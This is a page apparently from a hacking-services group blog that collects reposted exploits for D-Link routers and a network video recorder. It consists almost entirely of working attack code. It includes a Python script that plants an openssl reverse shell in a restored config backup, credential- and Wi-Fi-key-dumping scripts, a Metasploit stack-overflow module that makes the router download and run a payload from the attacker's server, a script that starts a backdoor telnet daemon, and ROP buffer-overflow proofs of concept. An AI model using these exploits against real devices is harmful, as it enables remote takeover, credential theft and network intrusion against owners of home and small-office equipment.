# Exploit Title: D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution
# Date: 13.09.2022
# Exploit Author: luka <luka@lukasec.ch>
# Exploit Writeup: https://lukasec.ch/posts/dlink_dnr322.html
# Vendor Homepage: https://dlink.com
# Vendor Advisory: https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10305
# Software Link: http://legacyfiles.us.dlink.com/DNR-322L/REVA/FIRMWARE
# Version: <= 2.60B15
# Tested on: Debian, Windows 10
"""
# Vulnerability
Inside the configuration backup from "Maintenance/System/Configuration Settings" is the bash script "rc.init.sh". The device does not check the integrity of a restored configuration backup which enables editing of set bash script. This bash script will be executed when the device boots.
# Usage
exploit.py [-h] -U USERNAME [-P PASSWORD] -t TARGET -l LHOST -p LPORT
options:
-h, --help show this help message and exit
-U USERNAME, --username USERNAME
Username, ex: admin
-P PASSWORD, --password PASSWORD
Password for the specified user
-t TARGET, --target TARGET
IP of the target, ex: 192.168.99.99
-l LHOST, --lhost LHOST
IP for the reverse shell to connect back to, ex: 123.123.123.123
-p LPORT, --lport LPORT
Port for the reverse shell to connect back to, ex: 8443
"""
import argparse, socket, requests, base64, urllib, os, shutil, tarfile, random, string
from ipaddress import ip_address
args = argparse.ArgumentParser()
args.add_argument(
"-U",
"--username",
type=str,
required=True,
dest="username",
help="Username, ex: admin",
)
args.add_argument(
"-P",
"--password",
type=str,
required=False,
dest="password",
help="Password for the specified user",
)
args.add_argument(
"-t",
"--target",
type=str,
required=True,
dest="target",
help="IP of the target, ex: 192.168.99.99",
)
args.add_argument(
"-l",
"--lhost",
type=str,
required=True,
dest="lhost",
help="IP for the reverse shell to connect back to, ex: 123.123.123.123",
)
args.add_argument(
"-p",
"--lport",
type=int,
required=True,
dest="lport",
help="Port for the reverse shell to connect back to, ex: 8443",
)
args = args.parse_args()
# base64 + url encode string
# returns string
def b64_url_encode(data):
enc = data.encode("utf-8")
encB = base64.b64encode(enc)
encUrl = urllib.parse.quote(str(encB, "utf-8"))
return encUrl
# since user input is always unsafe, test IPs
try:
ip_address(args.target)
except Exception:
print("[!] Target IP is not a valid IP address")
exit(1)
try:
ip_address(args.lhost)
except Exception:
print("[!] Reverse shell IP is not a valid IP address")
exit(1)
# check if target is online
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
# hardcoded http, change if needed
s.connect((args.target, 80))
s.close()
except Exception:
print("[!] Target is not online")
exit(1)
print("[+] Target is online")
# login param
authUrl = "http://" + args.target + "/cgi-bin/login_mgr.cgi"
authHeaders = {"content-type": "application/x-www-form-urlencoded"}
authCheckCmd = "cmd=ui_check_wto"
session = requests.Session()
# if password is empty supply dont supply anything
if not args.password:
authBody = (
"cmd=login&port=&mydlink=0&protocol=0&R_language=en&username="
+ args.username
+ "&pwd=&ssl_port=443&f_login_type=0&f_url="
)
else:
authBody = (
"cmd=login&port=&mydlink=0&protocol=0&R_language=en&username="
+ args.username
+ "&pwd="
+ b64_url_encode(args.password)
+ "&ssl_port=443&f_login_type=0&f_url="
)
try:
# login
reqLogin = session.post(authUrl, headers=authHeaders, data=authBody)
# check if successful
reqCheck = session.post(authUrl, headers=authHeaders, data=authCheckCmd)
if "success" in reqCheck.text:
print("[+] Login successful")
else:
print("[!] Error during login, check credentials")
exit(1)
except Exception as error:
print(error)
print("[!] Error during login, check credentials")
exit(1)
# download backup
print("[*] Downloading backup")
if os.path.exists("backup_clean"):
os.remove("backup_clean")
# download param
downloadUrl = "http://" + args.target + "/cgi-bin/system_mgr.cgi"
downloadHeaders = {"content-type": "application/x-www-form-urlencoded"}
downloadCmd = "cmd=cgi_backup_conf"
try:
reqBackup = session.post(downloadUrl, headers=downloadHeaders, data=downloadCmd)
except Exception as error:
print(error)
print("[!] Error while downloading backup")
exit(1)
# saving to disk
try:
f = open("backup_clean", "wb")
f.write(reqBackup.content)
f.close()
if not os.path.exists("backup_clean"):
print("[!] Error while saving backup")
exit(1)
except Exception as error:
print(error)
print("[!] Error while saving backup")
exit(1)
print("[+] Download successful")
# unpack backup (tar.gz file)
try:
config = tarfile.open("backup_clean")
config.extractall()
config.close()
except Exception as error:
print(error)
print("[!] Error while unpacking backup")
exit(1)
# inject stuff into startup script
try:
bashscript = open("backup/rc.init.sh", "a")
# revshell with openssl
payload = (
"\n(( sleep 10; rm -f /tmp/lol; mknod /tmp/lol p; cat /tmp/lol | /bin/ash -i 2>&1 | openssl s_client -quiet -connect %s:%s >/tmp/lol & ) & )\n"
% (args.lhost, args.lport)
)
bashscript.write(payload)
# also start a telnet deamon (has same passwd as web)
# bashscript.write("utelnetd -d")
bashscript.close()
except Exception as error:
print(error)
print("[!] Error while creating malicious backup")
exit(1)
print("[+] Created malicious backup")
# re pack file
try:
configInj = tarfile.open("backup_injected", "w:gz")
configInj.add("backup")
configInj.close()
# remove unpacked folder
shutil.rmtree("backup", ignore_errors=False, onerror=None)
except Exception as error:
print(error)
print("[!] Error while re-packing malicious backup")
exit(1)
# upload
print("[*] Uploading malicious backup")
uploadUrl = "http://" + args.target + "/cgi-bin/system_mgr.cgi"
uploadHeaders = {
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryhellothere"
}
configInj = open("backup_injected", "rb")
tardata = configInj.read().decode("latin-1")
uploadBody = (
'------WebKitFormBoundaryhellothere\r\nContent-Disposition: form-data; name="cmd"\r\n\r\ncgi_restore_conf\r\n------WebKitFormBoundaryhellothere\r\nContent-Disposition: form-data; name="file"; filename="backup"\r\nContent-Type: application/x-gzip\r\n\r\n'
+ tardata
+ "\r\n------WebKitFormBoundaryhellothere--\r\n"
)
reqUpload = session.post(uploadUrl, headers=uploadHeaders, data=uploadBody)
if "web/dsk_mgr/wait.html" in reqUpload.text:
print("[+] Upload successful, target will reboot now")
else:
print("[!] Error while uploading malicious backup")
exit(1)
# creating listener
print("[*] Started listener, waiting for the shell to connect back")
print("[*] When you are done kill the shell with Ctrl+C")
# random name
randInt = "".join(random.choice(string.ascii_lowercase) for i in range(10))
# generate the cert and the key for the openssl listener
os.system(
'openssl req -x509 -newkey rsa:4096 -keyout /tmp/%s_key.pem -out /tmp/%s_cert.pem -days 365 -nodes -subj "/CN=example.com" 2> /dev/null'
% (randInt, randInt)
)
# create an openssl listener
os.system(
"openssl s_server -quiet -key /tmp/%s_key.pem -cert /tmp/%s_cert.pem -port %s"
% (randInt, randInt, args.lport)
)
exit(0)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863149479
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit title: D-Link DIR601 2.02NA - Credential disclosure
# Date: 2018-07-10
# Exploit Author: Richard Rogerson
# Vendor Homepage: http://ca.dlink.com/
# Software Link: http://support.dlink.ca/ProductInfo.aspx?m=DIR-601
# Version: <= 2.02NA
# Tested on: D-Link DIR601 Firmware 2.02NA
# Contact: http://twitter.com/pktlabs
# Website: https://www.packetlabs.net
# CVE: N/A
# Category: Webapps, Remote
# 1. Description:
# Through analyzing the Captcha function implemented in the DIR-601 (2.02NA firmware),
# a HTTP request was found responsible for the handoff to client-side code.
# Inspecting the HTTP requests, it was identified that a parameter named ‘table_name’
# is used to instruct the back-end application which content to return. By abusing this
# request, it was found possible to retrieve sensitive information relating to the device
# configuration and administrative credentials.
# It is possible to modify the HTTP POST to my_cgi.cgi and include as table_name references
# to retrieve the administrative credentials, wireless ssid, and pre-shared key where
# applicable. Enumerating the naming conventions within the client-side code, it was
# determined that a number of potentially sensitive parameters/tables exist in the
# back-end environment which provide significant value if retrieved, four of these include:
# - Admin_user
# - Wireless_settings
# - Wireless_security
# - Wireless_wpa_settings
Sample of the vulnerable POST request:
HTTP Request
POST /my_cgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.1/login_real.htm
Content-Length: 86
Connection: close
Pragma: no-cache
Cache-Control: no-cache
request=no_auth&request=load_settings&table_name=create_auth_pic&table_name=admin_user <- additional table requested
Sample response:
HTTP Response
HTTP/1.1 200 OK
Content-type: text/xml
Connection: close
Date: Sat, 01 Jan 2011 00:57:12 GMT
Server: lighttpd/1.4.28
Content-Length: 228
<?xml version="1.0"?><root><login_level>1</login_level><show_authid>50649</show_authid><admin_user><admin_user_name>admin</admin_user_name><admin_user_pwd>clear-text-password</admin_user_pwd><admin_level>1</admin_level></admin_user></root>
# 2. Exploit Code:
#!/usr/bin/python
import socket,sys,urllib,urllib2
import xml.etree.ElementTree as ET
print """Packetlabs
====================================
D-Link DIR-601 Authorization Bypass
"""
if len(sys.argv) != 2:
print "usage:",sys.argv[0],"<ipaddr>"
sys.exit()
else:
ipaddr=sys.argv[1]
print "Retrieving admin username, password and wireless security configuration from",ipaddr
# build URL
url = 'http://'
url+= ipaddr
url+='/my_cgi.cgi'
data = "request=no_auth&request=load_settings&table_name=admin_user&table_name=user_user&table_name=wireless_settings&table_name=wireless_security&table_name=wireless_wpa_settings"
# send payload
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
print "Sending payload to:",response.geturl()
retr = response.read()
root = ET.fromstring(retr)
# credential dump
print "\r\nAdmin Creds"
print "username:",root[0][0].text
print "password:",root[0][1].text
# dump wireless settings
print "\r\nWireless Settings"
sectype=int(root[3][0].text)
ssid=root[2][2].text
enctype="none"
print "SSID is:", ssid
if sectype == 2:
enctype="WPA2"
key=root[4][3].text
elif sectype == 1:
enctype="WEP("
keylength=int(root[3][3].text)
if keylength == 5:
enctype+="64bit)"
key=root[3][5].text
elif keylength == 13:
enctype+="128bit)"
key=root[3][9].text
else:
key="Error, please inspect xml manually above, keylength=",keylength
print retr
elif sectype == 0:
print "Wireless network is open?"
sys.exit()
print enctype,"key is:",key
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# Payload working status:
# MIPS:
# - all valid payloads working (the ones that we are able to send without null bytes)
# ARM:
# - inline rev/bind shell works (bind... meh sometimes)
# - stager rev/bind shell FAIL
# - mettle rev/bind fails with sigsegv standalone, but works under strace or gdb...
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow',
'Description' => %q{
Several Dlink routers contain a pre-authentication stack buffer overflow vulnerability, which
is exposed on the LAN interface on port 80. This vulnerability affects the HNAP SOAP protocol,
which accepts arbitrarily long strings into certain XML parameters and then copies them into
the stack.
This exploit has been tested on the real devices DIR-818LW and 868L (rev. B), and it was tested
using emulation on the DIR-822, 823, 880, 885, 890 and 895. Others might be affected, and
this vulnerability is present in both MIPS and ARM devices.
The MIPS devices are powered by Lextra RLX processors, which are crippled MIPS cores lacking a
few load and store instructions. Because of this the payloads have to be sent unencoded, which
can cause them to fail, although the bind shell seems to work well.
For the ARM devices, the inline reverse tcp seems to work best.
Check the reference links to see the vulnerable firmware versions.
},
'Author' =>
[
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'References' =>
[
['CVE', '2016-6563'],
['US-CERT-VU', '677427'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt'],
['URL', 'http://seclists.org/fulldisclosure/2016/Nov/38']
],
'DefaultOptions' => { 'WfsDelay' => 10 },
'Stance' => Msf::Exploit::Stance::Aggressive, # we need this to run in the foreground (ARM target)
'Targets' =>
[
[ 'Dlink DIR-818 / 822 / 823 / 850 [MIPS]',
{
'Offset' => 3072,
'LibcBase' => 0x2aabe000, # should be the same offset for all firmware versions and all routers
'Sleep' => 0x56DF0, # sleep() offset into libuClibc-0.9.30.3.so
'FirstGadget' => 0x4EA1C, # see comments below for gadget information
'SecondGadget' => 0x2468C,
'ThirdGadget' => 0x41f3c,
'PrepShellcode1' => "\x23\xbd\xf3\xc8", # addi sp,sp,-3128
'PrepShellcode2' => "\x03\xa0\xf8\x09", # jalr sp
'BranchDelay' => "\x20\x84\xf8\x30", # addi a0,a0,-2000 (nop)
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => "\x00",
'EncoderType' => Msf::Encoder::Type::Raw # else it will fail with SIGILL, this CPU is crippled
},
}
],
[ 'Dlink DIR-868 (rev. B and C) / 880 / 885 / 890 / 895 [ARM]',
{
'Offset' => 1024,
'LibcBase' => 0x400DA000, # we can pick any xyz in 0x40xyz000 (an x of 0/1 works well)
'System' => 0x5A270, # system() offset into libuClibc-0.9.32.1.so
'FirstGadget' => 0x18298, # see comments below for gadget information
'SecondGadget' => 0x40CB8,
'Arch' => ARCH_ARMLE,
}
],
],
'DisclosureDate' => 'Nov 7 2016',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80),
OptString.new('SLEEP', [true, 'Seconds to sleep between requests (ARM only)', '0.5']),
OptString.new('SRVHOST', [true, 'IP address for the HTTP server (ARM only)', '0.0.0.0']),
OptString.new('SRVPORT', [true, 'Port for the HTTP server (ARM only)', '3333']),
OptString.new('SHELL', [true, 'Don\'t change this', '/bin/sh']),
OptString.new('SHELLARG', [true, 'Don\'t change this', 'sh']),
], self.class)
end
def check
begin
res = send_request_cgi({
'uri' => '/HNAP1/',
'method' => 'POST',
'Content-Type' => 'text/xml',
'headers' => { 'SOAPAction' => 'http://purenetworks.com/HNAP1/Login' }
})
if res && res.code == 500
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Safe
end
def calc_encode_addr (offset, big_endian = true)
if big_endian
[(target['LibcBase'] + offset).to_s(16)].pack('H*')
else
[(target['LibcBase'] + offset).to_s(16)].pack('H*').reverse
end
end
def prepare_shellcode_arm (cmd)
#All these gadgets are from /lib/libuClibc-0.9.32.1.so, which is the library used for all versions of firmware for all ARM routers
#first_gadget (pops system() address into r3, and second_gadget into PC):
#.text:00018298 LDMFD SP!, {R3,PC}
#second_gadget (puts the stack pointer into r0 and calls system() at r3):
#.text:00040CB8 MOV R0, SP
#.text:00040CBC BLX R3
#system() (Executes argument in r0 (our stack pointer)
#.text:0005A270 system
#The final payload will be:
#'a' * 1024 + 0xffffffff + 'b' * 16 + 'AAAA' + first_gadget + system() + second_gadget + command
shellcode = rand_text_alpha(target['Offset']) + # filler
"\xff\xff\xff\xff" + # n integer overwrite (see advisory)
rand_text_alpha(16) + # moar filler
rand_text_alpha(4) + # r11
calc_encode_addr(target['FirstGadget'], false) + # first_gadget
calc_encode_addr(target['System'], false) + # system() address
calc_encode_addr(target['SecondGadget'], false) + # second_gadget
cmd # our command
end
def prepare_shellcode_mips
#All these gadgets are from /lib/libuClibc-0.9.30.3.so, which is the library used for all versions of firmware for all MIPS routers
#<sleep> is at 56DF0
#first gadget - execute sleep and call second_gadget
#.text:0004EA1C move $t9, $s0 <- sleep()
#.text:0004EA20 lw $ra, 0x20+var_4($sp) <- second_gadget
#.text:0004EA24 li $a0, 2 <- arg for sleep()
#.text:0004EA28 lw $s0, 0x20+var_8($sp)
#.text:0004EA2C li $a1, 1
#.text:0004EA30 move $a2, $zero
#.text:0004EA34 jr $t9
#.text:0004EA38 addiu $sp, 0x20
#second gadget - put stack pointer in a1:
#.text:0002468C addiu $s1, $sp, 0x58
#.text:00024690 li $s0, 0x44
#.text:00024694 move $a2, $s0
#.text:00024698 move $a1, $s1
#.text:0002469C move $t9, $s4
#.text:000246A0 jalr $t9
#.text:000246A4 move $a0, $s2
#third gadget - call $a1 (stack pointer):
#.text:00041F3C move $t9, $a1
#.text:00041F40 move $a1, $a2
#.text:00041F44 addiu $a0, 8
#.text:00041F48 jr $t9
#.text:00041F4C nop
#When the crash occurs, the stack pointer is at xml_tag_value[3128]. In order to have a larger space for the shellcode (2000+ bytes), we can jump back to the beggining of the buffer.
#prep_shellcode_1: 23bdf7a8 addi sp,sp,-3128
#prep_shellcode_2: 03a0f809 jalr sp
#branch_delay: 2084f830 addi a0,a0,-2000
#The final payload will be:
#shellcode + 'a' * (2064 - shellcode.size) + sleep() + '%31' * 4 + '%32' * 4 + '%33' * 4 + third_gadget + first_gadget + 'b' * 0x1c + second_gadget + 'c' * 0x58 + prep_shellcode_1 + prep_shellcode_2 + branch_delay
shellcode = payload.encoded + # exploit
rand_text_alpha(target['Offset'] - payload.encoded.length) + # filler
calc_encode_addr(target['Sleep']) + # s0
rand_text_alpha(4) + # s1
rand_text_alpha(4) + # s2
rand_text_alpha(4) + # s3
calc_encode_addr(target['ThirdGadget']) + # s4 (third gadget)
calc_encode_addr(target['FirstGadget']) + # initial pc / ra (first_gadget)
rand_text_alpha(0x1c) + # filler
calc_encode_addr(target['SecondGadget']) + # second_gadget
rand_text_alpha(0x58) + # filler
target['PrepShellcode1'] + # exploit prep
target['PrepShellcode2'] + # exploit prep
target['BranchDelay'] # exploit prep
end
def send_payload (payload)
begin
# the payload can go in the Action, Username, LoginPassword or Captcha XML tag
body = %{
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<Login xmlns="http://purenetworks.com/HNAP1/">
<Action>something</Action>
<Username>Admin</Username>
<LoginPassword></LoginPassword>
<Captcha>#{payload}</Captcha>
</Login>
</soap:Body>
</soap:Envelope>
}
res = send_request_cgi({
'uri' => '/HNAP1/',
'method' => 'POST',
'ctype' => 'text/xml',
'headers' => { 'SOAPAction' => 'http://purenetworks.com/HNAP1/Login' },
'data' => body
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
end
end
# Handle incoming requests from the server
def on_request_uri(cli, request)
#print_status("on_request_uri called: #{request.inspect}")
if (not @pl)
print_error("#{peer} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("#{peer} - Sending the payload to the device...")
@elf_sent = true
send_response(cli, @pl)
end
def exploit
print_status("#{peer} - Attempting to exploit #{target.name}")
if target == targets[0]
send_payload(prepare_shellcode_mips)
else
downfile = rand_text_alpha(8+rand(8))
@pl = generate_payload_exe
@elf_sent = false
resource_uri = '/' + downfile
#do not use SSL
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end
service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
print_status("#{peer} - Starting up our web service on #{service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
datastore['SSL'] = true if ssl_restore
print_status("#{peer} - Asking the device to download and execute #{service_url}")
filename = rand_text_alpha_lower(rand(8) + 2)
cmd = "wget #{service_url} -O /tmp/#{filename}; chmod +x /tmp/#{filename}; /tmp/#{filename} &"
shellcode = prepare_shellcode_arm(cmd)
print_status("#{peer} - \"Bypassing\" the device's ASLR. This might take up to 15 minutes.")
counter = 0.00
while (not @elf_sent)
if counter % 50.00 == 0 && counter != 0.00
print_status("#{peer} - Tried #{counter.to_i} times in #{(counter * datastore['SLEEP'].to_f).to_i} seconds.")
end
send_payload(shellcode)
sleep datastore['SLEEP'].to_f # we need to be in the LAN, so a low value (< 1s) is fine
counter += 1
end
print_status("#{peer} - The device downloaded the payload after #{counter.to_i} tries / #{(counter * datastore['SLEEP'].to_f).to_i} seconds.")
end
end
end
source: https://www.securityfocus.com/bid/64043/info
Multiple D-Link DIR series routers are prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on devices running the vulnerable application. This may aid in further attacks.
#!/bin/sh
if [ -z "$1" ]; then
echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)";
echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b";
echo "usage: $0 [router address] [telnet port]";
exit 0;
fi;
if [ -z "$2" ]; then
TPORT=3333;
else
TPORT=$2;
fi
UPORT=31337;
echo "Trying $1 ...";
HTTPASSWD=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd"; | grep -A1 "<center>" | tail -1 |
sed -e "s/\t//g ; s/^\([^:]*\):\([^:]*\)$/\1\n \2/g"`;
if [ ! -z "$HTTPASSWD" ]; then
L=`echo $HTTPASSWD | cut -d' ' -f1`;
P=`echo $HTTPASSWD | cut -d' ' -f2`;
echo "found username: $L";
echo "found password: $P";
curl -d "ACTION_POST=LOGIN&LOGIN_USER=$L&LOGIN_PASSWD=$P" -sS "http://$1/login.php"; | grep -v "fail"
1>/dev/null;
if [ $? -eq 0 ]; then
curl -sS
"http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i
eth0.2 -p tcp --dport $TPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
curl -sS
"http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i
eth0.2 -p tcp --dport $UPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
curl -sS
"http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/telnetd -p $TPORT -l
/usr/sbin/login -u hacked:me&set/runtime/syslog/sendmail=1" 1>/dev/null;
echo "if you are lucky telnet is listening on $TPORT (hacked:me) ..."
curl -sS "http://$1/logout.php"; 1>/dev/null;
fi
fi
CHAP=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets"; | grep -A1 "<center>" | sed -e
"s/<center>//g"`;
if [ ! -z "$CHAP" ]; then
echo "found chap-secrets: $CHAP";
fi
echo "Bye bye.";
exit 0;
# Due to error in hnap protocol implementation we can overflow stack and execute any sh commands under root priviliges.
# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin
# E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/hnap.py
import requests as rq
import struct
IP = "192.168.0.1"
PORT = "80"
# Can differ in different version of routers and versions of firmware
# SYSTEM_ADDRESS = 0x1B570 # DIR-890L_REVA_FIRMWARE_PATCH_v1.11B02.BETA01
SYSTEM_ADDRESS = 0x1B50C # DIR-890L_REVA_FIRMWARE_1.10.B07
def _str(address):
return struct.pack("<I", address) if address > 0 else struct.pack("<i", address)
url = 'http://{ip}:{port}/HNAP1/'.format(ip=IP, port=PORT)
headers_text = {
'SOAPACTION' : 'http://purenetworks.com/HNAP1/Login',
'CONTENT-TYPE' : 'text/html'
}
payload = b"echo 1 > /tmp/hacked;"
print(rq.post(url, data=b"<Action>" + payload + b"A" * (0x400 - len(payload)) + _str(-1) + b"C" * 0x14 + _str(SYSTEM_ADDRESS)[0:3] + b"</Action>", headers=headers_text).text)
#!/bin/bash
# If you have access to an ethernet port you can upload custom firmware to a device because system recovery service is started and available for a few seconds after restart.
# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin
# E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/update.sh
FIRMWARE="firmware.bin"
IP="192.168.0.1"
while true; do
T=$(($RANDOM + ($RANDOM % 2) * 32768))
STATUS=`wget -t 1 --no-cache -T 0.2 -O - http://$IP/?_=$T 2>/dev/null`
if [[ $STATUS == *"<title>Provided by D-Link</title>"* ]]; then
echo "Uploading..."
curl -F "data=@$FIRMWARE" --connect-timeout 99999 -m 99999 --output /dev/null http://$IP/f2.htm
break
elif [[ $STATUS == *"<title>D-LINK</title>"* ]]; then
echo "Rebooting..."
echo -n -e '\x00\x01\x00\x01EXEC REBOOT SYSTEMaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' | timeout 1s nc -u $IP 19541
fi
done
# phpcgi is responsible for processing requests to .php, .asp and .txt pages. Also, it checks whether a user is authorized or not. Nevertheless, if a request is crafted in a proper way, an attacker can easily bypass authorization and execute a script that returns a login and password to a router.
# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin
# E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/phpcgi.py
import requests as rq
EQ = "%3d"
IP = "192.168.0.1"
PORT = "80"
def pair(key, value):
return "%0a_POST_" + key + EQ + value
headers_multipart = {
'CONTENT-TYPE' : 'application/x-www-form-urlencoded'
}
url = 'http://{ip}:{port}/getcfg.php'.format(ip=IP, port=PORT)
auth = "%0aAUTHORIZED_GROUP%3d1"
data = "A=A" + pair("SERVICES", "DEVICE.ACCOUNT") + auth
print(rq.get(url, data=data, headers=headers_multipart).text)
## Advisory Information
Title: DIR-890L/R Buffer overflows in authentication and HNAP functionalities.
Date published: July,17th, 2015
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-890L/R -- AC3200 Ultra Wi-Fi Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. But it works as the buffer overflow happens in a seperate process than web server which does not allow web server to crash and hence attacker wins.
## Details
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
buf = "GET /webfa_authentication.cgi?id="
buf+="A"*408
buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack
buf+="sh;#"+"CCCC"+"DDDD" #R0-R2
buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values
buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address
buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd
buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
#Currently the address of exit function in libraray used as $PC
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220
buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
## Advisory Information
Title: DIR-880L Buffer overflows in authenticatio and HNAP functionalities.
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-880L -- Wireless AC1900 Dual-Band Gigabit Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
